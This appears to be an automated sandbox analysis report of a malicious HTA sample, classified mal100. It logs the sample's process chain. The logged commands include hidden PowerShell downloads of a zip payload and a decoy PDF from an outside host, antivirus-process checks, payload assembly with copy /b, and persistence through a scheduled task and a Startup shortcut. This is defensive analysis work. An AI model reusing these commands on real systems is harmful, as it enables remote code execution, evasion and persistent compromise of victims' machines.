Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00BCE144	38_2_00BCE144
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00BB22AD	38_2_00BB22AD
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00BD22A2	38_2_00BD22A2
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00BEA26E	38_2_00BEA26E
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00BCC624	38_2_00BCC624
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00C3C8A4	38_2_00C3C8A4
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00BEE87F	38_2_00BEE87F
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00BE6ADE	38_2_00BE6ADE
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00C22A05	38_2_00C22A05
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00C18BFF	38_2_00C18BFF
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00BCCD7A	38_2_00BCCD7A
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00BDCE10	38_2_00BDCE10
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00BE7159	38_2_00BE7159
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00BB9240	38_2_00BB9240
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00C45311	38_2_00C45311
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00BB96E0	38_2_00BB96E0
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00BD1704	38_2_00BD1704
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00BD1A76	38_2_00BD1A76
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00BD7B8B	38_2_00BD7B8B
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00BB9B60	38_2_00BB9B60
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00BD7DBA	38_2_00BD7DBA
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00BD1D20	38_2_00BD1D20
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00BD1FE7	38_2_00BD1FE7

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: String function: 004062A3 appears 58 times
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: String function: 00BCFD52 appears 40 times
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: String function: 00BD0DA0 appears 46 times

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winHTA@72/99@8/2

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 38_2_00C241FA GetLastError,FormatMessageW,

38_2_00C241FA

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00C12010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		38_2_00C12010
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00C11A0B AdjustTokenPrivileges,CloseHandle,		38_2_00C11A0B

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe

15_2_004044A5

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 38_2_00C1DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

38_2_00C1DD87

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe

Code function: 15_2_004024FB CoCreateInstance,

15_2_004024FB

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 38_2_00C23A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

38_2_00C23A0E

Source: C:\Windows\SysWOW64\mshta.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\c2[1].bat

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3632:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3004:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2672:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3084:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3052:120:WilError_03

Source: C:\Windows\SysWOW64\mshta.exe

File created: C:\Users\user\AppData\Local\Temp\temp.bat

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat"

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Windows\SysWOW64\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: c2.hta

ReversingLabs: Detection: 18%

Source: unknown	Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\c2.hta"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\W2.pdf"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1620,i,2619577598228726768,6450084149098327694,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\msword\msword.exe msword.exe
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\cleanup.bat"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Nr Nr.cmd & Nr.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 361684
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Approaches
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Korea" Measurement
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 361684\Propose.com + Different + Constitute + Instantly + Led + Indonesia + Dressing + Missed + Brian + Clinton + Protocol 361684\Propose.com
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Next + ..\Math + ..\Blocked + ..\Leisure + ..\Substantial + ..\Beam + ..\Cocks + ..\David + ..\Undefined + ..\Realm U
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com Propose.com U
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & echo URL="C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat"	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\cleanup.bat"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\W2.pdf"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\msword\msword.exe msword.exe	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1620,i,2619577598228726768,6450084149098327694,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Nr Nr.cmd & Nr.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 361684
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Approaches
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Korea" Measurement
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 361684\Propose.com + Different + Constitute + Instantly + Led + Indonesia + Dressing + Missed + Brian + Clinton + Protocol 361684\Propose.com
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Next + ..\Math + ..\Blocked + ..\Leisure + ..\Substantial + ..\Beam + ..\Cocks + ..\David + ..\Undefined + ..\Realm U
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com Propose.com U
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & echo URL="C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y"

Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msdart.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: propsys.dll	Jump to behavior
